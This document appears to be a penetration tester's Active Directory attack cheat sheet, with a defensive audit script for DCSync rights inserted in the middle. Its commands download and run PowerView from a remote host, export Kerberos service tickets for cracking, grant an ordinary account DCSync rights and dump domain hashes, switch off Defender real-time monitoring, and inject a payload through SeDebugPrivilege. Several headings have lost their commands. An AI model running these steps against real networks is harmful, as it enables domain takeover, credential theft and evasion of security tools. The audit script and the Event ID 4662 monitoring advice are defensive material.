Active Directory attack
Domain Enumeration + Exploitation
POWERSPLOIT
Use the dev branch of PowerSploit. For an already incredible cheat sheet, check out HarmJ0y's.
IEX(New-Object Net.WebClient).downloadString('http://10.10.10.123/ps/PowerView.ps1')
Get Domain Users
Get-NetUser * -Domain corp.local | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset, lastlogontimestamp,accountexpires,admincount,userprincipalname, serviceprincipalname, mail,useraccountcontrol | Export-CSV users.csv
Get Domain Computers
Get-NetComputer * -Domain corp.local | Select-Object -Property dnshostname,operatingsystem,operatingsystemservicepack,lastlogontimestamp | Export-CSV computers.csv
SPN Ticket Request
Get-DomainUser * -SPN | Get-DomainSPNTicket -OutputFormat Hashcat | Export-Csv .\ticket.csv -NoTypeInformation
Enumerate User DACLs
Reset Domain User Password
If you own the owner of another AD user object (WriteOwner, WriteDACL, GenericWrite, Owner, etc), you can reset the password with ease:
Or if you can set yourself as owner, the following will do:
Add/Exploit DCSync Rights
Do you have WriteDACL to a domain? Give DCSync rights to an unprivileged domain user account:
Add-DomainObjectAcl -TargetIdentity "DC=burmatco,DC=local" -PrincipalIdentity useracct1 -Rights DCSync
And use these rights to dump the hashes from the domain:
meterpreter > dcsync_ntlm BURMATCO\useracct1
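Defender-side counterpart to the two commands above, added here and not part of the original cheat sheet: the `-Rights DCSync` ACE grants the replication extended rights on the domain head, so this script enumerates every principal holding those rights (or a GenericAll / unscoped ExtendedRight that covers them) and flags any that is not on an expected list. It assumes the RSAT ActiveDirectory module and uses the well-known schema GUIDs for the three DS-Replication-Get-Changes rights; the expected-principal list is a starting point to adjust per environment.

```powershell
# Audit script added as an example; not from the cheat sheet or PowerSploit.
# Requires the RSAT ActiveDirectory module (provides the AD: PSDrive).
Import-Module ActiveDirectory

# Extended-right GUIDs from the AD schema for the rights DCSync relies on.
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

$domain = Get-ADDomain
# Principals that typically hold these rights by default. Adjust for your environment
# (an Azure AD Connect MSOL_* account, for example, legitimately appears as well).
$Expected = @(
    'BUILTIN\Administrators',
    'NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS',
    'NT AUTHORITY\SYSTEM',
    "$($domain.NetBIOSName)\Domain Controllers",
    "$($domain.NetBIOSName)\Enterprise Read-only Domain Controllers"
)

function Get-DcSyncGrants {
    $acl = Get-Acl -Path "AD:\$($domain.DistinguishedName)"
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $guid = $ace.ObjectType.ToString().ToLower()
        # GenericAll, or ExtendedRight with an empty ObjectType (all extended rights),
        # also covers replication without naming a specific right.
        $grantsAll = ($ace.ActiveDirectoryRights -match 'GenericAll') -or
                     (($ace.ActiveDirectoryRights -match 'ExtendedRight') -and
                      $guid -eq [guid]::Empty.ToString())
        if (-not $grantsAll -and -not $ReplicationRights.ContainsKey($guid)) { continue }
        $rightName = if ($grantsAll) { 'All (GenericAll / unscoped ExtendedRight)' } else { $ReplicationRights[$guid] }
        [pscustomobject]@{
            Principal  = $ace.IdentityReference.Value
            Right      = $rightName
            Inherited  = $ace.IsInherited
            Unexpected = ($Expected -notcontains $ace.IdentityReference.Value)
        }
    }
}

$grants = Get-DcSyncGrants
$grants | Sort-Object Unexpected -Descending | Format-Table -AutoSize
# Anything with Unexpected = True (e.g. a plain user account granted DCSync as shown above)
# should be investigated and the ACE removed once confirmed not to be a service account.
"Owner of domain head: $((Get-Acl -Path "AD:\$($domain.DistinguishedName)").Owner)"
```

Pair the ACL audit with monitoring of Event ID 4662 for these same GUIDs, which records the replication requests themselves rather than only the standing permission.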
BLOODHOUND
Ingestor Launch
LDAP QUERIES
Below are some useful LDAP queries that will help you enumerate a system. Some of them require a valid username/password to get more information. My go-to for these queries is ldapsearch:
ASREPRoast Accounts
User Account Objects with SPNs
User and Computers with Unconstrained Delegation
Domain Administrators
Group Policies
EVADING AV
Checking Status
PowerShell Bypass with 32-bit
PowerShell disabled for you? Try running the 32-bit copy of it:
C:\windows\syswow64\windowspowershell\v1.0\powershell whoami
Writable Folders for Bypassing Execution Control
Try putting your payload in one of the following directories:
Turning Off Defender's RTM
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
AMSI Bypass
PROCESS ELEVATION (via SeDebugPrivilege)
If you run whoami /priv and you see SeDebugPrivilege set to Enabled, you can assume you already have SYSTEM.
One way of doing it is using decoder's psgetsys.ps1 script once you have a good idea of a PID to inject into:
. .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(7864,'C:\temp\burmat443.exe');
You can also gain an MSF session and use the module windows/manage/payload_inject with a PID of your choice.
REMOTE DESKTOP
Enable RDP
MISCELLANEOUS